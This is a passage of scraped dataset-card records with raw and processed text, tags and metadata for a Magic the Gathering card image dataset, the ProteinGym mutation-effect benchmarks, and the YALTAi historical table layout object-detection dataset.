A card images dataset of 4 types of creatures from Magic the Gathering card game: elf, goblin, knight, and zombie.
## Dataset Creation
All card information from Magic the Gathering card game is public available from the
Gatherer website, the official Magic Card Database. The dataset is just
a subset selection of 4 kind of creatures from the game. | [
"## Dataset Description\n\n- Homepage: the Gatherer\n- Repository: URL",
"### Dataset Summary\n\nA card images dataset of 4 types of creatures from Magic the Gathering card game: elf, goblin, knight, and zombie.",
"## Dataset Creation\n\nAll card information from Magic the Gathering card game is public available from the \nGatherer website, the official Magic Card Database. The dataset is just\na subset selection of 4 kind of creatures from the game."
] | [
"TAGS\n#task_categories-image-classification #task_ids-multi-class-image-classification #annotations_creators-found #size_categories-1K<n<10K #source_datasets-original #license-apache-2.0 #mgt #magic-card-game #creature-dataset #region-us \n",
"## Dataset Description\n\n- Homepage: the Gatherer\n- Repository: URL",
"### Dataset Summary\n\nA card images dataset of 4 types of creatures from Magic the Gathering card game: elf, goblin, knight, and zombie.",
"## Dataset Creation\n\nAll card information from Magic the Gathering card game is public available from the \nGatherer website, the official Magic Card Database. The dataset is just\na subset selection of 4 kind of creatures from the game."
] |
4075aa679683f3071d527283819637f3446ca488 | ## ProteinGym benchmarks overview
ProteinGym is an extensive set of Deep Mutational Scanning (DMS) assays curated to enable thorough comparisons of various mutation effect predictors indifferent regimes. It is comprised of two benchmarks: 1) a substitution benchmark which consists of the experimental characterisation of ∼1.5M missense variants across 87 DMS assays 2) an indel benchmark that includes ∼300k mutants across 7 DMS assays.
Each processed file in each benchmark corresponds to a single DMS assay, and contains the following three variables:
1) mutant (str):
- for the substitution benchmark, it describes the set of substitutions to apply on the reference sequence to obtain the mutated sequence (eg., A1P:D2N implies the amino acid 'A' at position 1 should be replaced by 'P', and 'D' at position 2 should be replaced by 'N')
- for the indel benchmark, it corresponds to the full mutated sequence
2) DMS_score (float): corresponds to the experimental measurement in the DMS assay. Across all assays, the higher the DMS_score value, the higher the fitness of the mutated protein
3) DMS_score_bin (int): indicates whether the DMS_score is above the fitness cutoff (1 is fit, 0 is not fit)
Additionally, we provide two reference files (ProteinGym_reference_file_substitutions.csv and ProteinGym_reference_file_indels.csv) that give further details on each assay and contain in particular:
- The UniProt_ID of the corresponding protein, along with taxon and MSA depth category
- The target sequence (target_seq) used in the assay
- Details on how the DMS_score was created from the raw files and how it was binarized
## Reference
If you use ProteinGym in your work, please cite the following paper:
```
Notin, P., Dias, M., Frazer, J., Marchena-Hurtado, J., Gomez, A., Marks, D.S., Gal, Y. (2022). Tranception: Protein Fitness Prediction with Autoregressive Transformers and Inference-time Retrieval. ICML.
```
## Links
- Pre-print: https://arxiv.org/abs/2205.13760
- Code: https://github.com/OATML-Markslab/Tranception | OATML-Markslab/ProteinGym | [
"arxiv:2205.13760",
"region:us"
] | 2022-07-28T21:55:30+00:00 | {} | 2022-07-28T23:12:02+00:00 | [
"2205.13760"
] | [] | TAGS
#arxiv-2205.13760 #region-us
| ## ProteinGym benchmarks overview
ProteinGym is an extensive set of Deep Mutational Scanning (DMS) assays curated to enable thorough comparisons of various mutation effect predictors indifferent regimes. It is comprised of two benchmarks: 1) a substitution benchmark which consists of the experimental characterisation of ∼1.5M missense variants across 87 DMS assays 2) an indel benchmark that includes ∼300k mutants across 7 DMS assays.
Each processed file in each benchmark corresponds to a single DMS assay, and contains the following three variables:
1) mutant (str):
- for the substitution benchmark, it describes the set of substitutions to apply on the reference sequence to obtain the mutated sequence (eg., A1P:D2N implies the amino acid 'A' at position 1 should be replaced by 'P', and 'D' at position 2 should be replaced by 'N')
- for the indel benchmark, it corresponds to the full mutated sequence
2) DMS_score (float): corresponds to the experimental measurement in the DMS assay. Across all assays, the higher the DMS_score value, the higher the fitness of the mutated protein
3) DMS_score_bin (int): indicates whether the DMS_score is above the fitness cutoff (1 is fit, 0 is not fit)
Additionally, we provide two reference files (ProteinGym_reference_file_substitutions.csv and ProteinGym_reference_file_indels.csv) that give further details on each assay and contain in particular:
- The UniProt_ID of the corresponding protein, along with taxon and MSA depth category
- The target sequence (target_seq) used in the assay
- Details on how the DMS_score was created from the raw files and how it was binarized
## Reference
If you use ProteinGym in your work, please cite the following paper:
## Links
- Pre-print: URL
- Code: URL | [
"## ProteinGym benchmarks overview\nProteinGym is an extensive set of Deep Mutational Scanning (DMS) assays curated to enable thorough comparisons of various mutation effect predictors indifferent regimes. It is comprised of two benchmarks: 1) a substitution benchmark which consists of the experimental characterisation of ∼1.5M missense variants across 87 DMS assays 2) an indel benchmark that includes ∼300k mutants across 7 DMS assays.\n\nEach processed file in each benchmark corresponds to a single DMS assay, and contains the following three variables:\n\n1) mutant (str):\n- for the substitution benchmark, it describes the set of substitutions to apply on the reference sequence to obtain the mutated sequence (eg., A1P:D2N implies the amino acid 'A' at position 1 should be replaced by 'P', and 'D' at position 2 should be replaced by 'N')\n- for the indel benchmark, it corresponds to the full mutated sequence\n2) DMS_score (float): corresponds to the experimental measurement in the DMS assay. Across all assays, the higher the DMS_score value, the higher the fitness of the mutated protein\n3) DMS_score_bin (int): indicates whether the DMS_score is above the fitness cutoff (1 is fit, 0 is not fit)\n\nAdditionally, we provide two reference files (ProteinGym_reference_file_substitutions.csv and ProteinGym_reference_file_indels.csv) that give further details on each assay and contain in particular:\n- The UniProt_ID of the corresponding protein, along with taxon and MSA depth category\n- The target sequence (target_seq) used in the assay\n- Details on how the DMS_score was created from the raw files and how it was binarized",
"## Reference\nIf you use ProteinGym in your work, please cite the following paper:",
"## Links\n- Pre-print: URL\n- Code: URL"
] | [
"TAGS\n#arxiv-2205.13760 #region-us \n",
"## ProteinGym benchmarks overview\nProteinGym is an extensive set of Deep Mutational Scanning (DMS) assays curated to enable thorough comparisons of various mutation effect predictors indifferent regimes. It is comprised of two benchmarks: 1) a substitution benchmark which consists of the experimental characterisation of ∼1.5M missense variants across 87 DMS assays 2) an indel benchmark that includes ∼300k mutants across 7 DMS assays.\n\nEach processed file in each benchmark corresponds to a single DMS assay, and contains the following three variables:\n\n1) mutant (str):\n- for the substitution benchmark, it describes the set of substitutions to apply on the reference sequence to obtain the mutated sequence (eg., A1P:D2N implies the amino acid 'A' at position 1 should be replaced by 'P', and 'D' at position 2 should be replaced by 'N')\n- for the indel benchmark, it corresponds to the full mutated sequence\n2) DMS_score (float): corresponds to the experimental measurement in the DMS assay. Across all assays, the higher the DMS_score value, the higher the fitness of the mutated protein\n3) DMS_score_bin (int): indicates whether the DMS_score is above the fitness cutoff (1 is fit, 0 is not fit)\n\nAdditionally, we provide two reference files (ProteinGym_reference_file_substitutions.csv and ProteinGym_reference_file_indels.csv) that give further details on each assay and contain in particular:\n- The UniProt_ID of the corresponding protein, along with taxon and MSA depth category\n- The target sequence (target_seq) used in the assay\n- Details on how the DMS_score was created from the raw files and how it was binarized",
"## Reference\nIf you use ProteinGym in your work, please cite the following paper:",
"## Links\n- Pre-print: URL\n- Code: URL"
] |
e936ae69e3c70ff651d47889a389de6f596863b2 | ## ProteinGym benchmarks overview
ProteinGym is an extensive set of Deep Mutational Scanning (DMS) assays curated to enable thorough comparisons of various mutation effect predictors indifferent regimes. It is comprised of two benchmarks: 1) a substitution benchmark which consists of the experimental characterisation of ∼1.5M missense variants across 87 DMS assays 2) an indel benchmark that includes ∼300k mutants across 7 DMS assays.
Each processed file in each benchmark corresponds to a single DMS assay, and contains the following three variables:
1) mutant (str):
- for the substitution benchmark, it describes the set of substitutions to apply on the reference sequence to obtain the mutated sequence (eg., A1P:D2N implies the amino acid 'A' at position 1 should be replaced by 'P', and 'D' at position 2 should be replaced by 'N')
- for the indel benchmark, it corresponds to the full mutated sequence
2) DMS_score (float): corresponds to the experimental measurement in the DMS assay. Across all assays, the higher the DMS_score value, the higher the fitness of the mutated protein
3) DMS_score_bin (int): indicates whether the DMS_score is above the fitness cutoff (1 is fit, 0 is not fit)
Additionally, we provide two reference files (ProteinGym_reference_file_substitutions.csv and ProteinGym_reference_file_indels.csv) that give further details on each assay and contain in particular:
- The UniProt_ID of the corresponding protein, along with taxon and MSA depth category
- The target sequence (target_seq) used in the assay
- Details on how the DMS_score was created from the raw files and how it was binarized
## Reference
If you use ProteinGym in your work, please cite the following paper:
```
Notin, P., Dias, M., Frazer, J., Marchena-Hurtado, J., Gomez, A., Marks, D.S., Gal, Y. (2022). Tranception: Protein Fitness Prediction with Autoregressive Transformers and Inference-time Retrieval. ICML.
```
## Links
- Pre-print: https://arxiv.org/abs/2205.13760
- Code: https://github.com/OATML-Markslab/Tranception
| ICML2022/ProteinGym | [
"arxiv:2205.13760",
"region:us"
] | 2022-07-28T22:16:18+00:00 | {} | 2022-07-28T23:19:31+00:00 | [
"2205.13760"
] | [] | TAGS
#arxiv-2205.13760 #region-us
| ## ProteinGym benchmarks overview
ProteinGym is an extensive set of Deep Mutational Scanning (DMS) assays curated to enable thorough comparisons of various mutation effect predictors indifferent regimes. It is comprised of two benchmarks: 1) a substitution benchmark which consists of the experimental characterisation of ∼1.5M missense variants across 87 DMS assays 2) an indel benchmark that includes ∼300k mutants across 7 DMS assays.
Each processed file in each benchmark corresponds to a single DMS assay, and contains the following three variables:
1) mutant (str):
- for the substitution benchmark, it describes the set of substitutions to apply on the reference sequence to obtain the mutated sequence (eg., A1P:D2N implies the amino acid 'A' at position 1 should be replaced by 'P', and 'D' at position 2 should be replaced by 'N')
- for the indel benchmark, it corresponds to the full mutated sequence
2) DMS_score (float): corresponds to the experimental measurement in the DMS assay. Across all assays, the higher the DMS_score value, the higher the fitness of the mutated protein
3) DMS_score_bin (int): indicates whether the DMS_score is above the fitness cutoff (1 is fit, 0 is not fit)
Additionally, we provide two reference files (ProteinGym_reference_file_substitutions.csv and ProteinGym_reference_file_indels.csv) that give further details on each assay and contain in particular:
- The UniProt_ID of the corresponding protein, along with taxon and MSA depth category
- The target sequence (target_seq) used in the assay
- Details on how the DMS_score was created from the raw files and how it was binarized
## Reference
If you use ProteinGym in your work, please cite the following paper:
## Links
- Pre-print: URL
- Code: URL
| [
"## ProteinGym benchmarks overview\nProteinGym is an extensive set of Deep Mutational Scanning (DMS) assays curated to enable thorough comparisons of various mutation effect predictors indifferent regimes. It is comprised of two benchmarks: 1) a substitution benchmark which consists of the experimental characterisation of ∼1.5M missense variants across 87 DMS assays 2) an indel benchmark that includes ∼300k mutants across 7 DMS assays.\n\nEach processed file in each benchmark corresponds to a single DMS assay, and contains the following three variables:\n\n1) mutant (str):\n- for the substitution benchmark, it describes the set of substitutions to apply on the reference sequence to obtain the mutated sequence (eg., A1P:D2N implies the amino acid 'A' at position 1 should be replaced by 'P', and 'D' at position 2 should be replaced by 'N')\n- for the indel benchmark, it corresponds to the full mutated sequence\n2) DMS_score (float): corresponds to the experimental measurement in the DMS assay. Across all assays, the higher the DMS_score value, the higher the fitness of the mutated protein\n3) DMS_score_bin (int): indicates whether the DMS_score is above the fitness cutoff (1 is fit, 0 is not fit)\nAdditionally, we provide two reference files (ProteinGym_reference_file_substitutions.csv and ProteinGym_reference_file_indels.csv) that give further details on each assay and contain in particular:\n- The UniProt_ID of the corresponding protein, along with taxon and MSA depth category\n- The target sequence (target_seq) used in the assay\n- Details on how the DMS_score was created from the raw files and how it was binarized",
"## Reference\nIf you use ProteinGym in your work, please cite the following paper:",
"## Links\n- Pre-print: URL\n- Code: URL"
] | [
"TAGS\n#arxiv-2205.13760 #region-us \n",
"## ProteinGym benchmarks overview\nProteinGym is an extensive set of Deep Mutational Scanning (DMS) assays curated to enable thorough comparisons of various mutation effect predictors indifferent regimes. It is comprised of two benchmarks: 1) a substitution benchmark which consists of the experimental characterisation of ∼1.5M missense variants across 87 DMS assays 2) an indel benchmark that includes ∼300k mutants across 7 DMS assays.\n\nEach processed file in each benchmark corresponds to a single DMS assay, and contains the following three variables:\n\n1) mutant (str):\n- for the substitution benchmark, it describes the set of substitutions to apply on the reference sequence to obtain the mutated sequence (eg., A1P:D2N implies the amino acid 'A' at position 1 should be replaced by 'P', and 'D' at position 2 should be replaced by 'N')\n- for the indel benchmark, it corresponds to the full mutated sequence\n2) DMS_score (float): corresponds to the experimental measurement in the DMS assay. Across all assays, the higher the DMS_score value, the higher the fitness of the mutated protein\n3) DMS_score_bin (int): indicates whether the DMS_score is above the fitness cutoff (1 is fit, 0 is not fit)\nAdditionally, we provide two reference files (ProteinGym_reference_file_substitutions.csv and ProteinGym_reference_file_indels.csv) that give further details on each assay and contain in particular:\n- The UniProt_ID of the corresponding protein, along with taxon and MSA depth category\n- The target sequence (target_seq) used in the assay\n- Details on how the DMS_score was created from the raw files and how it was binarized",
"## Reference\nIf you use ProteinGym in your work, please cite the following paper:",
"## Links\n- Pre-print: URL\n- Code: URL"
] |
65d7baf884b0ca8c02ad1f678b83904ccc1d2062 |
# YALTAi Tabular Dataset
## Table of Contents
- [YALTAi Tabular Dataset](#YALTAi-Tabular-Dataset)
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Initial Data Collection and Normalization](#initial-data-collection-and-normalization)
- [Who are the source language producers?](#who-are-the-source-language-producers)
- [Annotations](#annotations)
- [Annotation process](#annotation-process)
- [Who are the annotators?](#who-are-the-annotators)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** [https://doi.org/10.5281/zenodo.6827706](https://doi.org/10.5281/zenodo.6827706)
- **Paper:** [https://arxiv.org/abs/2207.11230](https://arxiv.org/abs/2207.11230)
### Dataset Summary
This dataset contains a subset of data used in the paper [You Actually Look Twice At it (YALTAi): using an object detectionapproach instead of region segmentation within the Kraken engine](https://arxiv.org/abs/2207.11230). This paper proposes treating page layout recognition on historical documents as an object detection task (compared to the usual pixel segmentation approach). This dataset covers pages with tabular information with the following objects "Header", "Col", "Marginal", "text".
### Supported Tasks and Leaderboards
- `object-detection`: This dataset can be used to train a model for object-detection on historic document images.
## Dataset Structure
This dataset has two configurations. These configurations both cover the same data and annotations but provide these annotations in different forms to make it easier to integrate the data with existing processing pipelines.
- The first configuration, `YOLO`, uses the data's original format.
- The second configuration converts the YOLO format into a format which is closer to the `COCO` annotation format. This is done to make it easier to work with the `feature_extractor`s from the `Transformers` models for object detection, which expect data to be in a COCO style format.
### Data Instances
An example instance from the COCO config:
```
{'height': 2944,
'image': <PIL.PngImagePlugin.PngImageFile image mode=L size=2064x2944 at 0x7FA413CDA210>,
'image_id': 0,
'objects': [{'area': 435956,
'bbox': [0.0, 244.0, 1493.0, 292.0],
'category_id': 0,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 88234,
'bbox': [305.0, 127.0, 562.0, 157.0],
'category_id': 2,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 5244,
'bbox': [1416.0, 196.0, 92.0, 57.0],
'category_id': 2,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 5720,
'bbox': [1681.0, 182.0, 88.0, 65.0],
'category_id': 2,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 374085,
'bbox': [0.0, 540.0, 163.0, 2295.0],
'category_id': 1,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 577599,
'bbox': [104.0, 537.0, 253.0, 2283.0],
'category_id': 1,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 598670,
'bbox': [304.0, 533.0, 262.0, 2285.0],
'category_id': 1,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 56,
'bbox': [284.0, 539.0, 8.0, 7.0],
'category_id': 1,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 1868412,
'bbox': [498.0, 513.0, 812.0, 2301.0],
'category_id': 1,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 307800,
'bbox': [1250.0, 512.0, 135.0, 2280.0],
'category_id': 1,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 494109,
'bbox': [1330.0, 503.0, 217.0, 2277.0],
'category_id': 1,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 52,
'bbox': [1734.0, 1013.0, 4.0, 13.0],
'category_id': 1,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []},
{'area': 90666,
'bbox': [0.0, 1151.0, 54.0, 1679.0],
'category_id': 1,
'id': 0,
'image_id': '0',
'iscrowd': False,
'segmentation': []}],
'width': 2064}
```
An example instance from the YOLO config:
``` python
{'image': <PIL.PngImagePlugin.PngImageFile image mode=L size=2064x2944 at 0x7FAA140F2450>,
'objects': {'bbox': [[747, 390, 1493, 292],
[586, 206, 562, 157],
[1463, 225, 92, 57],
[1725, 215, 88, 65],
[80, 1688, 163, 2295],
[231, 1678, 253, 2283],
[435, 1675, 262, 2285],
[288, 543, 8, 7],
[905, 1663, 812, 2301],
[1318, 1653, 135, 2280],
[1439, 1642, 217, 2277],
[1737, 1019, 4, 13],
[26, 1991, 54, 1679]],
'label': [0, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1]}}
```
### Data Fields
The fields for the YOLO config:
- `image`: the image
- `objects`: the annotations which consist of:
- `bbox`: a list of bounding boxes for the image
- `label`: a list of labels for this image
The fields for the COCO config:
- `height`: height of the image
- `width`: width of the image
- `image`: image
- `image_id`: id for the image
- `objects`: annotations in COCO format, consisting of a list containing dictionaries with the following keys:
- `bbox`: bounding boxes for the images
- `category_id`: a label for the image
- `image_id`: id for the image
- `iscrowd`: COCO `iscrowd` flag
- `segmentation`: COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts)
### Data Splits
The dataset contains a train, validation and test split with the following numbers per split:
| | train | validation | test |
|----------|-------|------------|------|
| examples | 196 | 22 | 135 |
## Dataset Creation
> [this] dataset was produced using a single source, the Lectaurep Repertoires dataset [Rostaing et al., 2021], which served as a basis for only the training and development split. The testset is composed of original data, from various documents, from the 17th century up to the early 20th with a single soldier war report. The test set is voluntarily very different and out of domain with column borders that are not drawn nor printed in certain cases, layout in some kind of masonry layout. p.8
.
### Curation Rationale
This dataset was created to produce a simplified version of the [Lectaurep Repertoires dataset](https://github.com/HTR-United/lectaurep-repertoires), which was found to contain:
> around 16 different ways to describe columns, from Col1 to Col7, the case-different col1-col7 and finally ColPair and ColOdd, which we all reduced to Col p.8
### Source Data
#### Initial Data Collection and Normalization
The LECTAUREP (LECTure Automatique de REPertoires) project, which began in 2018, is a joint initiative of the Minutier central des notaires de Paris, the National Archives and the
Minutier central des notaires de Paris of the National Archives, the [ALMAnaCH (Automatic Language Modeling and Analysis & Computational Humanities)](https://www.inria.fr/en/almanach) team at Inria and the EPHE (Ecole Pratique des Hautes Etudes), in partnership with the Ministry of Culture.
> The lectaurep-bronod corpus brings together 100 pages from the repertoire of Maître Louis Bronod (1719-1765), notary in Paris from December 13, 1719 to July 23, 1765. The pages concerned were written during the years 1742 to 1745.
#### Who are the source language producers?
[More information needed]
### Annotations
| | Train | Dev | Test | Total | Average area | Median area |
|----------|-------|-----|------|-------|--------------|-------------|
| Col | 724 | 105 | 829 | 1658 | 9.32 | 6.33 |
| Header | 103 | 15 | 42 | 160 | 6.78 | 7.10 |
| Marginal | 60 | 8 | 0 | 68 | 0.70 | 0.71 |
| Text | 13 | 5 | 0 | 18 | 0.01 | 0.00 |
| | | | - | | | |
#### Annotation process
[More information needed]
#### Who are the annotators?
[More information needed]
### Personal and Sensitive Information
This data does not contain information relating to living individuals.
## Considerations for Using the Data
### Social Impact of Dataset
A growing number of datasets are related to page layout for historical documents. This dataset offers a different approach to annotating these datasets (focusing on object detection rather than pixel-level annotations). Improving document layout recognition can have a positive impact on downstream tasks, in particular Optical Character Recognition.
### Discussion of Biases
Historical documents contain a wide variety of page layouts. This means that the ability of models trained on this dataset to transfer to documents with very different layouts is not guaranteed.
### Other Known Limitations
[More information needed]
## Additional Information
### Dataset Curators
### Licensing Information
[Creative Commons Attribution 4.0 International](https://creativecommons.org/licenses/by/4.0/legalcode)
### Citation Information
```
@dataset{clerice_thibault_2022_6827706,
author = {Clérice, Thibault},
title = {YALTAi: Tabular Dataset},
month = jul,
year = 2022,
publisher = {Zenodo},
version = {1.0.0},
doi = {10.5281/zenodo.6827706},
url = {https://doi.org/10.5281/zenodo.6827706}
}
```
[](https://doi.org/10.5281/zenodo.6827706)
### Contributions
Thanks to [@davanstrien](https://github.com/davanstrien) for adding this dataset.
| biglam/yalta_ai_tabular_dataset | [
"task_categories:object-detection",
"annotations_creators:expert-generated",
"language_creators:expert-generated",
"size_categories:n<1K",
"license:cc-by-4.0",
"manuscripts",
"LAM",
"arxiv:2207.11230",
"region:us"
] | 2022-07-29T06:02:34+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": ["expert-generated"], "language": [], "license": ["cc-by-4.0"], "multilinguality": [], "size_categories": ["n<1K"], "source_datasets": [], "task_categories": ["object-detection"], "task_ids": [], "pretty_name": "YALTAi Tabular Dataset", "tags": ["manuscripts", "LAM"]} | 2022-10-23T20:56:38+00:00 | [
"2207.11230"
] | [] | TAGS
#task_categories-object-detection #annotations_creators-expert-generated #language_creators-expert-generated #size_categories-n<1K #license-cc-by-4.0 #manuscripts #LAM #arxiv-2207.11230 #region-us
| YALTAi Tabular Dataset
======================
Table of Contents
-----------------
* YALTAi Tabular Dataset
+ Table of Contents
+ Dataset Description
- Dataset Summary
- Supported Tasks and Leaderboards
+ Dataset Structure
- Data Instances
- Data Fields
- Data Splits
+ Dataset Creation
- Curation Rationale
- Source Data
* Initial Data Collection and Normalization
* Who are the source language producers?
- Annotations
* Annotation process
* Who are the annotators?
- Personal and Sensitive Information
+ Considerations for Using the Data
- Social Impact of Dataset
- Discussion of Biases
- Other Known Limitations
+ Additional Information
- Dataset Curators
- Licensing Information
- Citation Information
- Contributions
Dataset Description
-------------------
* Homepage: URL
* Paper: URL
### Dataset Summary
This dataset contains a subset of data used in the paper You Actually Look Twice At it (YALTAi): using an object detectionapproach instead of region segmentation within the Kraken engine. This paper proposes treating page layout recognition on historical documents as an object detection task (compared to the usual pixel segmentation approach). This dataset covers pages with tabular information with the following objects "Header", "Col", "Marginal", "text".
### Supported Tasks and Leaderboards
* 'object-detection': This dataset can be used to train a model for object-detection on historic document images.
Dataset Structure
-----------------
This dataset has two configurations. These configurations both cover the same data and annotations but provide these annotations in different forms to make it easier to integrate the data with existing processing pipelines.
* The first configuration, 'YOLO', uses the data's original format.
* The second configuration converts the YOLO format into a format which is closer to the 'COCO' annotation format. This is done to make it easier to work with the 'feature\_extractor's from the 'Transformers' models for object detection, which expect data to be in a COCO style format.
### Data Instances
An example instance from the COCO config:
An example instance from the YOLO config:
### Data Fields
The fields for the YOLO config:
* 'image': the image
* 'objects': the annotations which consist of:
+ 'bbox': a list of bounding boxes for the image
+ 'label': a list of labels for this image
The fields for the COCO config:
* 'height': height of the image
* 'width': width of the image
* 'image': image
* 'image\_id': id for the image
* 'objects': annotations in COCO format, consisting of a list containing dictionaries with the following keys:
+ 'bbox': bounding boxes for the images
+ 'category\_id': a label for the image
+ 'image\_id': id for the image
+ 'iscrowd': COCO 'iscrowd' flag
+ 'segmentation': COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts)
### Data Splits
The dataset contains a train, validation and test split with the following numbers per split:
Dataset Creation
----------------
>
> [this] dataset was produced using a single source, the Lectaurep Repertoires dataset [Rostaing et al., 2021], which served as a basis for only the training and development split. The testset is composed of original data, from various documents, from the 17th century up to the early 20th with a single soldier war report. The test set is voluntarily very different and out of domain with column borders that are not drawn nor printed in certain cases, layout in some kind of masonry layout. p.8
> .
>
>
>
### Curation Rationale
This dataset was created to produce a simplified version of the Lectaurep Repertoires dataset, which was found to contain:
>
> around 16 different ways to describe columns, from Col1 to Col7, the case-different col1-col7 and finally ColPair and ColOdd, which we all reduced to Col p.8
>
>
>
### Source Data
#### Initial Data Collection and Normalization
The LECTAUREP (LECTure Automatique de REPertoires) project, which began in 2018, is a joint initiative of the Minutier central des notaires de Paris, the National Archives and the
Minutier central des notaires de Paris of the National Archives, the ALMAnaCH (Automatic Language Modeling and Analysis & Computational Humanities) team at Inria and the EPHE (Ecole Pratique des Hautes Etudes), in partnership with the Ministry of Culture.
>
> The lectaurep-bronod corpus brings together 100 pages from the repertoire of Maître Louis Bronod (1719-1765), notary in Paris from December 13, 1719 to July 23, 1765. The pages concerned were written during the years 1742 to 1745.
>
>
>
#### Who are the source language producers?
[More information needed]
### Annotations
#### Annotation process
[More information needed]
#### Who are the annotators?
[More information needed]
### Personal and Sensitive Information
This data does not contain information relating to living individuals.
Considerations for Using the Data
---------------------------------
### Social Impact of Dataset
A growing number of datasets are related to page layout for historical documents. This dataset offers a different approach to annotating these datasets (focusing on object detection rather than pixel-level annotations). Improving document layout recognition can have a positive impact on downstream tasks, in particular Optical Character Recognition.
### Discussion of Biases
Historical documents contain a wide variety of page layouts. This means that the ability of models trained on this dataset to transfer to documents with very different layouts is not guaranteed.
### Other Known Limitations
[More information needed]
Additional Information
----------------------
### Dataset Curators
### Licensing Information
Creative Commons Attribution 4.0 International
: using an object detectionapproach instead of region segmentation within the Kraken engine. This paper proposes treating page layout recognition on historical documents as an object detection task (compared to the usual pixel segmentation approach). This dataset covers pages with tabular information with the following objects \"Header\", \"Col\", \"Marginal\", \"text\".",
"### Supported Tasks and Leaderboards\n\n\n* 'object-detection': This dataset can be used to train a model for object-detection on historic document images.\n\n\nDataset Structure\n-----------------\n\n\nThis dataset has two configurations. These configurations both cover the same data and annotations but provide these annotations in different forms to make it easier to integrate the data with existing processing pipelines.\n\n\n* The first configuration, 'YOLO', uses the data's original format.\n* The second configuration converts the YOLO format into a format which is closer to the 'COCO' annotation format. This is done to make it easier to work with the 'feature\\_extractor's from the 'Transformers' models for object detection, which expect data to be in a COCO style format.",
"### Data Instances\n\n\nAn example instance from the COCO config:\n\n\nAn example instance from the YOLO config:",
"### Data Fields\n\n\nThe fields for the YOLO config:\n\n\n* 'image': the image\n* 'objects': the annotations which consist of:\n\t+ 'bbox': a list of bounding boxes for the image\n\t+ 'label': a list of labels for this image\n\n\nThe fields for the COCO config:\n\n\n* 'height': height of the image\n* 'width': width of the image\n* 'image': image\n* 'image\\_id': id for the image\n* 'objects': annotations in COCO format, consisting of a list containing dictionaries with the following keys:\n\t+ 'bbox': bounding boxes for the images\n\t+ 'category\\_id': a label for the image\n\t+ 'image\\_id': id for the image\n\t+ 'iscrowd': COCO 'iscrowd' flag\n\t+ 'segmentation': COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts)",
"### Data Splits\n\n\nThe dataset contains a train, validation and test split with the following numbers per split:\n\n\n\nDataset Creation\n----------------\n\n\n\n> \n> [this] dataset was produced using a single source, the Lectaurep Repertoires dataset [Rostaing et al., 2021], which served as a basis for only the training and development split. The testset is composed of original data, from various documents, from the 17th century up to the early 20th with a single soldier war report. The test set is voluntarily very different and out of domain with column borders that are not drawn nor printed in certain cases, layout in some kind of masonry layout. p.8\n> .\n> \n> \n>",
"### Curation Rationale\n\n\nThis dataset was created to produce a simplified version of the Lectaurep Repertoires dataset, which was found to contain:\n\n\n\n> \n> around 16 different ways to describe columns, from Col1 to Col7, the case-different col1-col7 and finally ColPair and ColOdd, which we all reduced to Col p.8\n> \n> \n>",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nThe LECTAUREP (LECTure Automatique de REPertoires) project, which began in 2018, is a joint initiative of the Minutier central des notaires de Paris, the National Archives and the\nMinutier central des notaires de Paris of the National Archives, the ALMAnaCH (Automatic Language Modeling and Analysis & Computational Humanities) team at Inria and the EPHE (Ecole Pratique des Hautes Etudes), in partnership with the Ministry of Culture.\n\n\n\n> \n> The lectaurep-bronod corpus brings together 100 pages from the repertoire of Maître Louis Bronod (1719-1765), notary in Paris from December 13, 1719 to July 23, 1765. The pages concerned were written during the years 1742 to 1745.\n> \n> \n>",
"#### Who are the source language producers?\n\n\n[More information needed]",
"### Annotations",
"#### Annotation process\n\n\n[More information needed]",
"#### Who are the annotators?\n\n\n[More information needed]",
"### Personal and Sensitive Information\n\n\nThis data does not contain information relating to living individuals.\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset\n\n\nA growing number of datasets are related to page layout for historical documents. This dataset offers a different approach to annotating these datasets (focusing on object detection rather than pixel-level annotations). Improving document layout recognition can have a positive impact on downstream tasks, in particular Optical Character Recognition.",
"### Discussion of Biases\n\n\nHistorical documents contain a wide variety of page layouts. This means that the ability of models trained on this dataset to transfer to documents with very different layouts is not guaranteed.",
"### Other Known Limitations\n\n\n[More information needed]\n\n\nAdditional Information\n----------------------",
"### Dataset Curators",
"### Licensing Information\n\n\nCreative Commons Attribution 4.0 International\n\n\n: using an object detectionapproach instead of region segmentation within the Kraken engine. This paper proposes treating page layout recognition on historical documents as an object detection task (compared to the usual pixel segmentation approach). This dataset covers pages with tabular information with the following objects \"Header\", \"Col\", \"Marginal\", \"text\".",
